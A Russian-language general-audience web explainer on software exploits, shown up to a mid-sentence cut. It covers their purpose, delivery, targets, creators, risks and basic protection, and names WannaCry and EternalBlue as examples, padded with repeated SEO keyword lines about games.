Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…

Эксплойты (Exploits)

Эксплойты (exploits) ΡΠ²Π»ΡΡŽΡ‚ΡΡ ΠΏΠΎΠ΄Π²ΠΈΠ΄ΠΎΠΌ врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ. Π’Π΅Ρ€ΠΌΠΈΠ½ связан с английским Π³Π»Π°Π³ΠΎΠ»ΠΎΠΌ «to exploit», ΠΎΠ·Π½Π°Ρ‡Π°ΡŽΡ‰ΠΈΠΌ Β«ΡΠΊΡΠΏΠ»ΡƒΠ°Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ, ΠΏΡ€ΠΈΠΌΠ΅Π½ΡΡ‚ΡŒ Π² своих интСрСсах». Π’ΠΏΡ€ΠΎΡ‡Π΅ΠΌ, эксплойт β€” это Π½Π΅ ΠΎΠ±ΡΠ·Π°Ρ‚Π΅Π»ΡŒΠ½ΠΎ ΠΎΡ‚Π΄Π΅Π»ΡŒΠ½ΠΎΠ΅ ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅ (исполняСмый Ρ„Π°ΠΉΠ»): ΠΎΠ½ ΠΌΠΎΠΆΠ΅Ρ‚ ΠΈΠΌΠ΅Ρ‚ΡŒ Π²ΠΈΠ΄ нСбольшого Ρ„Ρ€Π°Π³ΠΌΠ΅Π½Ρ‚Π° врСдоносного ΠΊΠΎΠ΄Π° ΠΈΠ»ΠΈ Π½Π°Π±ΠΎΡ€Π° ΠΊΠΎΠΌΠ°Π½Π΄, выполняСмых Π² ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½ΠΎΠΌ порядкС. Π˜ΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² ΠΊΠ°ΠΊΠΎΠΉ-Π»ΠΈΠ±ΠΎ систСмной ΠΈΠ»ΠΈ ΠΏΡ€ΠΈΠΊΠ»Π°Π΄Π½ΠΎΠΉ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ΅, эксплойт ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚ Π½Π° устройствС ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹ нСсанкционированноС дСйствиС. Как ΠΏΡ€Π°Π²ΠΈΠ»ΠΎ, ΠΎΠ½ΠΎ позволяСт ΠΏΠΎΠ²Ρ‹ΡΠΈΡ‚ΡŒ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ Π² Ρ†Π΅Π»Π΅Π²ΠΎΠΉ систСмС ΠΈΠ»ΠΈ Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄.

Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…

Π¦Π΅Π»ΠΈ Ρ€Π°Π±ΠΎΡ‚Ρ‹ эксплойта Ρ€Π°Π·Π½ΠΎΠΎΠ±Ρ€Π°Π·Π½Ρ‹: Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠ° ΠΈ установка врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ, ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€Π°Π² доступа, остановка Ρ€Π°Π±ΠΎΡ‚Ρ‹ систСмы, раскрытиС ΠΊΠΎΠ½Ρ„ΠΈΠ΄Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹Ρ…. Π‘Π»Π΅Π΄ΡƒΠ΅Ρ‚ Π·Π°ΠΌΠ΅Ρ‚ΠΈΡ‚ΡŒ, Ρ‡Ρ‚ΠΎ сами эксплойты Π½Π΅ ΠΎΡΡƒΡ‰Π΅ΡΡ‚Π²Π»ΡΡŽΡ‚ дСструктивных дСйствий Π½Π°ΠΏΡ€ΡΠΌΡƒΡŽ: ΠΈΡ… Π·Π°Π΄Π°Ρ‡Π° β€” Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒΡŽ, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΎΠ±Π΅ΡΠΏΠ΅Ρ‡ΠΈΡ‚ΡŒ запуск Π²Π»ΠΎΠΆΠ΅Π½Π½ΠΎΠ³ΠΎ Π² Π½ΠΈΡ… ΠΊΠΎΠ΄Π°. ВсС ΠΏΠΎΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΠΈ выполняСт ΠΈΠΌΠ΅Π½Π½ΠΎ врСдоносная Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠ°, ΠΈ ΠΎΡ‚ Π΅Π΅ содСрТания зависит Ρ‚ΠΎ, ΠΊΠ°ΠΊΠΎΠΉ Ρ†Π΅Π»ΠΈ достигнСт Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊ.

ΠšΠ»Π°ΡΡΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΡ эксплойтов

Эксплойты (exploits) ΠΌΠΎΠ³ΡƒΡ‚ ΠΏΡ€ΠΈΠΌΠ΅Π½ΡΡ‚ΡŒΡΡ ΠΊ Π»ΡŽΠ±Ρ‹ΠΌ элСмСнтам ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π½ΠΎΠΉ систСмы. ΠžΠ±ΡŠΠ΅ΠΊΡ‚ΠΎΠΌ Π°Ρ‚Π°ΠΊΠΈ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ ΠΌΠΎΠ΄ΡƒΠ»ΠΈ ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ систСмы, ΠΏΡ€ΠΈΠΊΠ»Π°Π΄Π½Ρ‹Π΅ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ ΠΈ Π΄Π°ΠΆΠ΅ Π°ΠΏΠΏΠ°Ρ€Π°Ρ‚Π½Ρ‹Π΅ ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚Ρ‹. Для ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎΠΉ Π°Ρ‚Π°ΠΊΠΈ Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎ Π·Π°ΡΡ‚Π°Π²ΠΈΡ‚ΡŒ ΠΆΠ΅Ρ€Ρ‚Π²Ρƒ ΠΏΠ΅Ρ€Π΅ΠΉΡ‚ΠΈ ΠΏΠΎ ссылкС, Π·Π°Π³Ρ€ΡƒΠ·ΠΈΡ‚ΡŒ ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΡŒ Ρ„Π°ΠΉΠ», Ρ‡Ρ‚ΠΎΠ±Ρ‹ эксплойт ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠ» Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ ΠΏΡ€ΠΎΡΠΊΡΠΏΠ»ΡƒΠ°Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ Π½ΡƒΠΆΠ½ΡƒΡŽ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ.

ΠŸΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ эксплойты Ρ€Π°Π·Ρ€Π°Π±Π°Ρ‚Ρ‹Π²Π°ΡŽΡ‚ΡΡ для осущСствлСния Ρ€Π°Π·Π½Ρ‹Ρ… дСйствий Π½Π° Π·Π°Ρ€Π°ΠΆΠ΅Π½Π½ΠΎΠΉ систСмС, ΠΈΡ… ΠΌΠΎΠΆΠ½ΠΎ ΠΊΠ»Π°ΡΡΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΏΠΎ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Ρƒ назначСния:

Эксплойты ΠΏΠΎΠΏΠ°Π΄Π°ΡŽΡ‚ Π² ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ Ρ€Π°Π·Π½Ρ‹ΠΌΠΈ способами. Π’ частности, ΠΌΠΎΠΆΠ΅Ρ‚ ΠΏΡ€ΠΎΠΈΠ·ΠΎΠΉΡ‚ΠΈ прямоС Π²ΠΌΠ΅ΡˆΠ°Ρ‚Π΅Π»ΡŒΡΡ‚Π²ΠΎ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ° Π² систСму. Если сСтСвого доступа ΠΊ Π°Ρ‚Π°ΠΊΡƒΠ΅ΠΌΠΎΠΉ систСмС Π½Π΅Ρ‚, Ρ‚ΠΎ высылаСтся письмо Π½Π° ΡΠ»Π΅ΠΊΡ‚Ρ€ΠΎΠ½Π½ΡƒΡŽ ΠΏΠΎΡ‡Ρ‚Ρƒ ΠΈΠ»ΠΈ сообщСниС Ρ‡Π΅Ρ€Π΅Π· мСссСндТСр со ссылкой Π½Π° врСдоносный ΠΊΠΎΠ΄.

ΠžΠ±ΡŠΠ΅ΠΊΡ‚ воздСйствия

Эксплойты, являясь ΠΏΠΎΠ΄Π²ΠΈΠ΄ΠΎΠΌ врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ для воздСйствия Π½Π° ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π½Ρ‹Π΅ устройства Ρ€Π°Π·Π½Ρ‹Ρ… ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ. Π­Ρ‚ΠΎ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ ΠΌΠ°ΡˆΠΈΠ½Ρ‹ коммСрчСских ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΉ, государствСнных структур, Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹Ρ… ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΉ. Π’Π°ΠΊΠΆΠ΅ ΠΏΡ€ΠΈ ΠΏΠΎΠΌΠΎΡ‰ΠΈ эксплойтов Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ ΠΏΡ€ΠΎΠ½ΠΈΠΊΠ°ΡŽΡ‚ Π² ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π½Ρ‹Π΅ систСмы рядовых ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ для ΠΊΡ€Π°ΠΆΠΈ Π»ΠΈΡ‡Π½ΠΎΠΉ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ, особСнно ΠΈΠΌΠ΅ΡŽΡ‰Π΅ΠΉ ΠΎΡ‚Π½ΠΎΡˆΠ΅Π½ΠΈΠ΅ ΠΊ финансам.

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ ΡƒΠ³Ρ€ΠΎΠ·Ρ‹

Π‘ΠΎΠ·Π΄Π°ΡŽΡ‚ΡΡ эксплойты кибСрпрСступниками высокой ΠΊΠ²Π°Π»ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€ΠΎΠ΄Π°ΡŽΡ‚ ΠΈΡ… Π½Π° Ρ‡Π΅Ρ€Π½ΠΎΠΌ Ρ€Ρ‹Π½ΠΊΠ΅ Π΄Ρ€ΡƒΠ³ΠΈΠΌ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌ. Π’ качСствС элСмСнтов кибСроруТия ΠΎΠ½ΠΈ Ρ€Π°Π·Ρ€Π°Π±Π°Ρ‚Ρ‹Π²Π°ΡŽΡ‚ΡΡ ΠΈ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ спСцслуТбами.

Π’Π°ΠΊΠΆΠ΅ эксплойты ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚ΠΎΠΌ Ρ€Π°Π±ΠΎΡ‚Ρ‹ спСциалистов ΠΏΠΎ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ бСзопасности, ΠΆΠ΅Π»Π°ΡŽΡ‰ΠΈΡ… ΠΏΠΎΠΊΠ°Π·Π°Ρ‚ΡŒ, ΠΊΠ°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ ΠΌΠΎΠΆΠ΅Ρ‚ ΡΠΊΡΠΏΠ»ΡƒΠ°Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒΡΡ обнаруТСнная ΠΈΠΌΠΈ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ. Π’ этом случаС ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΠΈ ПО ΠΎΠΏΠΎΠ²Π΅Ρ‰Π°ΡŽΡ‚ΡΡ ΠΎΠ± уязвимостях Π΄ΠΎ ΠΏΡƒΠ±Π»ΠΈΠΊΠ°Ρ†ΠΈΠΈ эксплойта Π² ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΎΠΌ доступС.

НаконСц, эксплойты ΠΈΠ½ΠΎΠ³Π΄Π° Ρ€Π°Π·Ρ€Π°Π±Π°Ρ‚Ρ‹Π²Π°ΡŽΡ‚ΡΡ студСнтами ΠΈ Π½Π°Ρ‡ΠΈΠ½Π°ΡŽΡ‰ΠΈΠΌΠΈ программистами для ΡΠΎΠ²Π΅Ρ€ΡˆΠ΅Π½ΡΡ‚Π²ΠΎΠ²Π°Π½ΠΈΡ своих ΡƒΠΌΠ΅Π½ΠΈΠΉ.

Анализ риска

НСсмотря Π½Π° старания спСциалистов, уязвимости Π΅ΡΡ‚ΡŒ практичСски Π²ΠΎ всСх ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°Ρ…, Π° Π·Π½Π°Ρ‡ΠΈΡ‚, для Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΎΠ² всСгда Π΅ΡΡ‚ΡŒ Π»Π°Π·Π΅ΠΉΠΊΠ° для ΠΏΠΎΠ΄Π³ΠΎΡ‚ΠΎΠ²ΠΊΠΈ эксплойта. К ΠΌΠΎΠΌΠ΅Π½Ρ‚Ρƒ, ΠΊΠΎΠ³Π΄Π° Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΈ выпустят ΠΏΠ°Ρ‚Ρ‡ (Π½Π΅Π±ΠΎΠ»ΡŒΡˆΡƒΡŽ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡƒ для исправлСния уязвимых Ρ„Π°ΠΉΠ»ΠΎΠ²), врСдоносная ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° ΠΌΠΎΠΆΠ΅Ρ‚ нанСсти ΠΎΠ³Ρ€ΠΎΠΌΠ½Ρ‹ΠΉ ΡƒΡ€ΠΎΠ½. Под ΡƒΠ³Ρ€ΠΎΠ·Ρƒ ΠΏΠΎΠΏΠ°Π΄Π°ΡŽΡ‚ всС ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ, Π²ΠΊΠ»ΡŽΡ‡Π°Ρ самых остороТных ΠΈ Π²Π½ΠΈΠΌΠ°Ρ‚Π΅Π»ΡŒΠ½Ρ‹Ρ….

ΠŸΠΎΡΠ»Π΅Π΄ΡΡ‚Π²ΠΈΡ примСнСния эксплойта ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ самыми Ρ€Π°Π·Π½Ρ‹ΠΌΠΈ. Π­Ρ‚ΠΎ зависит ΠΎΡ‚ Π·Π°Π΄Π°Ρ‡ΠΈ, которая ΡΡ‚Π°Π²ΠΈΠ»Π°ΡΡŒ ΠΏΠ΅Ρ€Π΅Π΄ врСдоносными ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°ΠΌΠΈ: ΠΎΡ‚ Π½Π°Ρ€ΡƒΡˆΠ΅Π½ΠΈΡ Ρ€Π°Π±ΠΎΡ‚Ρ‹ систСмы Π΄ΠΎ ΠΏΠΎΡ‚Π΅Ρ€ΠΈ ΠΊΡ€ΡƒΠΏΠ½Ρ‹Ρ… Π΄Π΅Π½Π΅ΠΆΠ½Ρ‹Ρ… сумм, сСкрСтной ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ.

ΠžΠ±Π΅Π·ΠΎΠΏΠ°ΡΠΈΡ‚ΡŒ своС устройство ΠΎΡ‚ эксплойта ΠΌΠΎΠΆΠ½ΠΎ, Ссли ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ антивирусными ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°ΠΌΠΈ ΠΎΡ‚ извСстных ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΉ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ постоянно ΡΠΎΠ²Π΅Ρ€ΡˆΠ΅Π½ΡΡ‚Π²ΡƒΡŽΡ‚ свои ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Ρ‹. Бнизят риски зараТСния рСгулярноС ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠ΅ ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ систСмы ΠΈ ΠΏΡ€ΠΈΠΊΠ»Π°Π΄Π½Ρ‹Ρ… ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ, ΠΎΡ‚ΠΊΠ°Π· ΠΎΡ‚ ΠΏΠ΅Ρ€Π΅Ρ…ΠΎΠ΄ΠΎΠ² ΠΏΠΎ ΠΏΠΎΠ΄ΠΎΠ·Ρ€ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹ΠΌ ссылкам, ΠΈΠ³Π½ΠΎΡ€ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ спам-сообщСний, Π²Π½ΠΈΠΌΠ°Ρ‚Π΅Π»ΡŒΠ½ΠΎΠ΅ ΠΎΡ‚Π½ΠΎΡˆΠ΅Π½ΠΈΠ΅ ΠΊ финансовым опСрациям.

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ

Эксплойт

Π­Ρ‚ΠΎ врСдоносный ΠΊΠΎΠ΄, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ уязвимости Π² систСмС бСзопасности ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠ³ΠΎ обСспСчСния для распространСния ΠΊΠΈΠ±Π΅Ρ€ΡƒΠ³Ρ€ΠΎΠ·.

Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойт?

Π‘Ρ‚Π°Π½Π΄Π°Ρ€Ρ‚Π½ΠΎΠ΅ ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½ΠΈΠ΅ Ρ…Π°Ρ€Π°ΠΊΡ‚Π΅Ρ€ΠΈΠ·ΡƒΠ΅Ρ‚ «эксплойт» ΠΊΠ°ΠΊ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡƒ ΠΈΠ»ΠΈ ΠΊΠΎΠ΄, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ нСдостатки Π² систСмС бСзопасности ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½ΠΎΠ³ΠΎ прилоТСния для зараТСния устройства.

ΠŸΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ ΠΌΠΎΠ³ΡƒΡ‚ ΠΎΡˆΠΈΠ±ΠΎΡ‡Π½ΠΎ ΡΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ, Ρ‡Ρ‚ΠΎ это ΠΎΡ‚Π΄Π΅Π»ΡŒΠ½ΠΎΠ΅ врСдоносноС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠ΅ обСспСчСниС. Однако Π½Π° самом Π΄Π΅Π»Π΅, это Ρ„Ρ€Π°Π³ΠΌΠ΅Π½Ρ‚ ΠΊΠΎΠ΄Π° ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ позволяСт ΠΏΡ€ΠΎΠ½ΠΈΠΊΠ°Ρ‚ΡŒ Π² систСму ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π° ΠΈ Π²Π»ΠΈΡΡ‚ΡŒ Π½Π° Π΅Π³ΠΎ Ρ€Π°Π±ΠΎΡ‚Ρƒ.

Π˜ΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½ΡƒΡŽ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ, Π΄Π°Π½Π½Ρ‹ΠΉ инструмСнт прСдоставляСт Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌ Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΡ‹Π΅ Ρ€Π°Π·Ρ€Π΅ΡˆΠ΅Π½ΠΈΡ для запуска врСдоносных ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚ΠΎΠ² ΠΈ зараТСния систСмы.

Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…

ΠžΡΠΎΠ±Π΅Π½Π½ΠΎΡΡ‚ΠΈ распространСния

Π—Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ постоянно ΡΠΎΠ²Π΅Ρ€ΡˆΠ΅Π½ΡΡ‚Π²ΡƒΡŽΡ‚ свой инструмСнтарий ΠΈ находят Π½ΠΎΠ²Ρ‹Π΅ способы зараТСния большого количСства устройств. Одним ΠΈΠ· распространСнных ΠΌΠ΅Ρ‚ΠΎΠ΄ΠΎΠ² проникновСния врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ Π½Π° ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Ρ‹ ΠΆΠ΅Ρ€Ρ‚Π² стало использованиС эксплойтов, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΎΠ±Π΅ΡΠΏΠ΅Ρ‡ΠΈΠ²Π°ΡŽΡ‚ быстроС распространСниС ΡƒΠ³Ρ€ΠΎΠ·Ρ‹.

Π’Π°ΠΊΠΆΠ΅ ΠΎΠ½ΠΈ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‚ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ доступ ΠΊ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°ΠΌ ΠΈ Π² дальнСйшСм Π·Π°Ρ€Π°ΠΆΠ°Ρ‚ΡŒ устройство ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ Ρ‡Π΅Ρ€Π΅Π· ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² систСмС бСзопасности.

Π—Π° послСдниС Π³ΠΎΠ΄Ρ‹ Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ Π°ΠΊΡ‚ΠΈΠ²Π½Ρ‹ΠΌΠΈ Π±Ρ‹Π»ΠΈ ΡƒΠ³Ρ€ΠΎΠ·Ρ‹, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ уязвимости Π² ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Π°Ρ… Java, Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠΌ обСспСчСнии Adobe, Π° Ρ‚Π°ΠΊΠΆΠ΅ ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ систСмС Windows.

Π˜Π·Π²Π΅ΡΡ‚Π½Ρ‹Π΅ ΠΏΡ€ΠΈΠΌΠ΅Ρ€Ρ‹

Π’ послСднСС врСмя эксплойты ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ Π²ΠΎ ΠΌΠ½ΠΎΠ³ΠΈΡ… извСстных ΠΊΠΈΠ±Π΅Ρ€Π°Ρ‚Π°ΠΊΠ°Ρ…. ΠŸΡ€ΠΈΠΌΠ΅Ρ€ΠΎΠΌ являСтся ΠΌΠ°ΡΡˆΡ‚Π°Π±Π½Π°Ρ Π°Ρ‚Π°ΠΊΠ° вируса WannaCryptor (ΠΈΠ»ΠΈ WannaCry), которая стала ΠΊΡ€ΡƒΠΏΠ½Π΅ΠΉΡˆΠ΅ΠΉ Ρ†ΠΈΡ„Ρ€ΠΎΠ²ΠΎΠΉ ΡƒΠ³Ρ€ΠΎΠ·ΠΎΠΉ Π² ΠΌΠΈΡ€Π΅ Π·Π° послСдниС Π³ΠΎΠ΄Ρ‹. Π‘Ρ‚ΠΎΠΈΡ‚ ΠΎΡ‚ΠΌΠ΅Ρ‚ΠΈΡ‚ΡŒ, Ρ‡Ρ‚ΠΎ Π²ΠΎ врСмя этой Π°Ρ‚Π°ΠΊΠΈ использовался эксплойт EternalBlue, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π±Ρ‹Π» якобы ΠΏΠΎΡ…ΠΈΡ‰Π΅Π½ Π³Ρ€ΡƒΠΏΠΏΠΎΠΉ кибСрпрСступников Π² АгСнтствС Π½Π°Ρ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΠΉ бСзопасности (NSA). EternalBlue Π±Ρ‹Π» Π½Π°Ρ†Π΅Π»Π΅Π½ Π½Π° ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ 